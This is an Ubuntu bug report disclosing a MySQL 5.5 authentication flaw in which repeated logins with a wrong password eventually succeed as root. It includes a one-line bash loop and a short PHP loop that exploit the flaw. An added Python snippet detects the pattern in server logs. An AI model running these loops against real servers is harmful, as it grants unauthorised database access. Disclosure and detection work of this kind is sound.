mysql login possible without knowing password

Bug #1011602 reported by sseitz on 2012-06-11
This bug affects 1 person
Affects Status Importance Assigned to Milestone
mysql-5.5 (Ubuntu)
Undecided
Unassigned

Bug Description

Running Ubuntu 12.04 LTS 64bit, it's possible to get access to mysql (mysql-server 5.5.22-0ubuntu1) by only knowing a username.

I've tested on a few different distributions/versions, but only Ubuntu 12.04 LTS (I only have 64-bit at hand) shows that problem.

I tried that bash line:

for i in `seq 1 1000`; do mysql -u root --password=something -h 127.0.0.1 2>/dev/null; done

Also, a few lines of PHP work the very same way:

<?php
$n=0;
while (!$db=@mysql_connect('localhost','root','something')) { $n++; }
echo 'got it after '.$n." trials\r\n";

I assume this is a big security problem.
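
A server-side check for the pattern described in this report, added here as an example and not part of the original bug report: it flags any accepted login that directly follows a run of password failures for the same user and host. The log layout (modelled on general query log "Connect" entries), the sample lines, the function name and the threshold are assumptions; adjust the regexes to the log you actually collect.

```python
import re
from collections import defaultdict

# Constructed sample lines, modelled on general query log "Connect" entries.
# Assumed layout: "<connection id> Connect<TAB><detail>".
SAMPLE_LOG = (
    ["%d Connect\tAccess denied for user 'root'@'localhost' (using password: YES)" % i
     for i in range(101, 108)]                       # 7 failures in a row
    + ["108 Connect\troot@localhost on ",            # ...then an accepted login
       "109 Connect\tAccess denied for user 'app'@'10.0.0.5' (using password: YES)",
       "110 Connect\tapp@10.0.0.5 on shop",          # one typo, then success
       "111 Connect\tbackup@localhost on "]          # clean login, no failures
)

DENIED = re.compile(r"^\s*\d+\s+Connect\s+Access denied for user '([^']*)'@'([^']*)'")
ACCEPTED = re.compile(r"^\s*\d+\s+Connect\s+(\S+?)@(\S+) on")


def find_suspicious_logins(lines, threshold=5):
    """Return (user, host, failures) for every accepted login that was
    immediately preceded by at least `threshold` failures for that pair."""
    streak = defaultdict(int)   # (user, host) -> consecutive failures so far
    hits = []
    for line in lines:
        denied = DENIED.match(line)
        if denied:
            streak[denied.groups()] += 1
            continue
        accepted = ACCEPTED.match(line)
        if accepted:
            key = accepted.groups()
            if streak[key] >= threshold:
                hits.append((key[0], key[1], streak[key]))
            streak[key] = 0     # a success ends the run either way
    return hits


if __name__ == "__main__":
    for user, host, failures in find_suspicious_logins(SAMPLE_LOG):
        print("accepted login for %s@%s after %d failures" % (user, host, failures))
```

A single mistyped password followed by a success stays below the default threshold, so only the long failure run on root@localhost is reported.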

visibility: private → public
sseitz (s-seitz) wrote :

Forgot to add the original post which made me aware of the bug:

http://seclists.org/oss-sec/2012/q2/493

This report contains Public Security information
Everyone can see this security related information.